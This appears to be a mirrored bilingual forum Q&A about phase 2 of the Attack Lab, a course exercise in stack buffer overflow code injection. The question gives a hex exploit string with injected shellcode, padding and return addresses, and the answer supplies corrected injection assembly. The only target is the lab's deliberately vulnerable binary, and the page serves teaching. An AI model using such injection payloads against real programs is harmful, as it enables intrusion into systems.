缓冲区溢出攻击(攻击实验室阶段2) [英] Buffer overflow Attack (The Attack Lab phase 2)
问题描述
I have a buffer overflow lab I have to do for a project called The Attack Lab. I'm on phase 2 of the lab, and I have to inject code as part of my exploit string in order to make the program point to the address of the function touch2(). I've gotten to the point where the output says that its a valid solution for phase 2, but then it says I caused a seg fault and then says I failed the phase.
这是我收到的错误消息
cookie: 0x2d6fc2d5
Type string:Touch2!: You called touch2(0x2d6fc2d5)
valid solution for level 2 with target ctarget
ouch! You caused a segmentation fault!
better luck next time
FAILED
这是我在汇编中的攻击代码
this is my exploit code in assembly
mov1 $0x2d6fc2d5, %rdi
retq
这就是我传递给程序的内容
this is what I pass into the program
48 c7 c7 d5 c2 6f 2d c3 #bytecode of exploit code
00 00 00 00 00 00 00 00 #padding of 0x38, amount needed to overwrite ret address
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
68 bd 66 55 00 00 00 00 #address of rsp - 0x38
0d 18 40 00 00 00 00 00 #address of touch2()
我已经看过在线教程,并且已经进行了数小时的研究,但是我还没有找到解决方案,所以我不确定是什么引起了问题.它说该解决方案是有效的,但随后会出现故障并失败.任何帮助将不胜感激,如果有需要澄清的地方,请告诉我!
I've looked at tutorials online and have been working on this for hours, but I haven't found a solution and I'm not sure what's causing the issue. It says the solution is valid, but then seg faults and fails. Any help would be greatly appreciated and let me know if there's anything that needs clarifying!
推荐答案
似乎最近对攻击实验室进行了调整.您应该避免覆盖堆栈中返回地址的下一部分
It seems the attack lab has been tweaked recently. You should avoid overwrite the next part of the return address in stack
相反,您可以使用推指令将值添加到堆栈中.尝试从输入中删除touch2地址,并使用以下代码.
Instead, you can use push instruction to add values to the stack. Try remove touch2 address from the input and use following code.
mov $0x2d6fc2d5, %rdi
pushq $0x40180d
ret
这篇关于缓冲区溢出攻击(攻击实验室阶段2)的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
